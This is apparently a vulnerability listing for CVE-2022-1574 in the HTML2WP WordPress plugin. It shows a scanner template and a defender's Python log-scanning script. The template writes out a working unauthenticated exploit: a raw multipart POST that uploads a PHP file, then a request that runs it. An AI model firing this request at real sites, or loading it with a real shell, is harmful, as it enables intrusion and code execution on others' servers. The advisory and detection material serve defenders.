| Reporter | Title | Published | Views |
|---|---|---|---|
| attackerkb | CVE-2022-1574 | 27 Jun 2022 09:15 | – |
| circl | CVE-2022-1574 | 20 Nov 2025 21:02 | – |
| cnnvd | WordPress plugin HTML2WP code issue vulnerability | 27 Jun 2022 00:00 | – |
| cnvd | WordPress HTML2WP plugin arbitrary file upload vulnerability | 30 Jun 2022 00:00 | – |
| cve | CVE-2022-1574 | 27 Jun 2022 08:57 | – |
| cvelist | CVE-2022-1574 HTML2WP <= 1.0.0 - Unauthenticated Arbitrary File Upload | 27 Jun 2022 08:57 | – |
| nvd | CVE-2022-1574 | 27 Jun 2022 09:15 | – |
| patchstack | WordPress HTML2WP plugin <= 1.0.0 - Unauthenticated Arbitrary File Upload vulnerability | 2 Jun 2022 00:00 | – |
| prion | Cross site request forgery (csrf) | 27 Jun 2022 09:15 | – |
| ptsecurity | PT-2022-13973 · WordPress · Html2Wp | 27 Jun 2022 00:00 | – |

```yaml
id: CVE-2022-1574

info:
  name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
  impact: |
    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
  remediation: |
    Update to the latest version of the plugin or remove it if not needed.
  reference:
    - https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
    - https://wordpress.org/plugins/html2wp/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1574
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1574
    cwe-id: CWE-352
    epss-score: 0.11866
    epss-percentile: 0.95574
    cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: html2wp_project
    product: html2wp
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project,vuln,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 253
        Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
        Connection: close

        -----------------------------7816508136577551742878603990
        Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
        Content-Type: text/html

        <?php
        echo "File Upload success";
        -----------------------------7816508136577551742878603990--
      - |
        GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 302"
          - "status_code_2 == 200"
          - "contains(body_2, 'File Upload success')"
        condition: and
# digest: 4a0a0047304502203f12deed90d8172d67ecf6f3cb60962ea580ff6800246a1f562ced363651242b022100e85a8210397135791e7618fede62573c028498cfc7d9f3da4f32d750c4d041cb:922c64590222798bb761d5b6d8e72950
```
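
The request pair this template sends leaves a recognisable trace in a web server access log: a POST to the `html2wp-settings` admin page, then a 200 response for a script under the `html2wp` uploads directory. The following is an added example for defenders, not part of the template or of this page's source. The combined log format, the list of executable extensions and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_DIR = "/wp-content/uploads/html2wp/"   # upload path taken from the template
SCRIPT_EXT = (".php", ".phtml", ".phar")      # assumption: extensions the server executes

def scan(lines):
    """Return a list of (kind, ip, timestamp, target) findings."""
    findings, posted = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        page = parse_qs(url.query).get("page", [])
        if (m["method"] == "POST" and url.path.endswith("/wp-admin/admin.php")
                and "html2wp-settings" in page):
            # Import request; remember the client for correlation.
            posted.add(m["ip"])
            findings.append(("import_post", m["ip"], m["ts"], m["target"]))
        elif (UPLOAD_DIR in url.path and m["status"] == "200"
                and url.path.lower().endswith(SCRIPT_EXT)):
            # A script was served from the plugin's upload directory.
            kind = "script_served_after_post" if m["ip"] in posted else "script_served"
            findings.append((kind, m["ip"], m["ts"], m["target"]))
    return findings

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [27/Jun/2022:09:15:01 +0000] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 302 0 "-" "-"',
    '203.0.113.7 - - [27/Jun/2022:09:15:02 +0000] "GET /wp-content/uploads/html2wp/a1b2c3.php HTTP/1.1" 200 19 "-" "-"',
    '198.51.100.4 - - [27/Jun/2022:09:16:10 +0000] "GET /wp-content/uploads/html2wp/index.html HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [27/Jun/2022:09:17:30 +0000] "GET /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="  ")
```

A `script_served` finding without a preceding POST from the same client is still worth reviewing, since the upload may have come from a different address or predate the log window.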